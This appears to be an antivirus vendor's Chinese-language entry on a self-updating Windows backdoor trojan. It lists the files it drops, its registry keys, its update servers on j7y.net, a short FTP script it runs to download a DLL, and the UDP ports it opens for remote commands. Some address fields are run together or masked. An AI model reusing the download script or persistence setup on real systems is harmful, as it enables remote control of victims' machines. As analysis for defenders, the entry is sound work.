病毒名称(中文):
病毒别名:
威胁级别:
★☆☆☆☆
病毒类型:
黑客程序
病毒长度:
683520
影响系统:
Win9xWinMeWinNTWin2000WinXPWin2003
病毒行为:
该病毒是一个会自动在线更新的后门程序。该病毒会在系统留下后门供黑客控制感染机器。建议电脑用户升级病毒库及打开防火墙,以免中毒受害。
1、生成的文件
C:\WINNT\system32\wbem\winlogon.exe
C:\WINNT\system32\wmvdmoes32.dll
C:\WINNT\system32\wbem\SysOption.bin
C:\WINNT\system32\AddrConfig.bin
C:\WINNT\system32\wbem\kbd101ab.dll
C:\WINNT\system32\wbem\ddes\BoExplorer.rar
C:\WINNT\system32\wbem\ddes\DownBoExplorer.rar
C:\WINNT\system32\x
2、
HKCR\TypeLib\{F63B08CD-3645-474F-8872-BA4293251FF9}\1.0\0\win32
(Default)
"C:\WINNT\system32\wbem\winlogon.exe"
HKCR\CLSID\{881F6F06-4620-4070-AD05-BD77D4C56661}\TypeLib
(Default)
"{F63B08CD-3645-474F-8872-BA4293251FF9}"
3、
HKCR\CLSID\{881F6F06-4620-4070-AD05-BD77D4C56661}
(Default)
"SysBackHelperObject"
HKCR\CLSID\{881F6F06-4620-4070-AD05-BD77D4C56661}\LocalServer32
(Default)
"C:\WINNT\system32\wbem\winlogon.exe"
4、下载http://upcfg.j7y.net/upcfg/Newdownurl.txt文本取得在线更新地址列表。
5、在线更新地址列表
http://update.j7y.net/NewUpdate/
http://down1.j7y.net/NewUpdate/
http://down2.j7y.net/NewUpdate/
6、该病毒会调用ftp程序执行文件x指令,如下:
-------------------------------------------
open192.168.4.1447313
usernetapix
bin
getjlkkul.dll
bye
-------------------------------------------
7、该病毒开启6100及10**两个UDP端口,接收黑客输入指令和收集用户信息。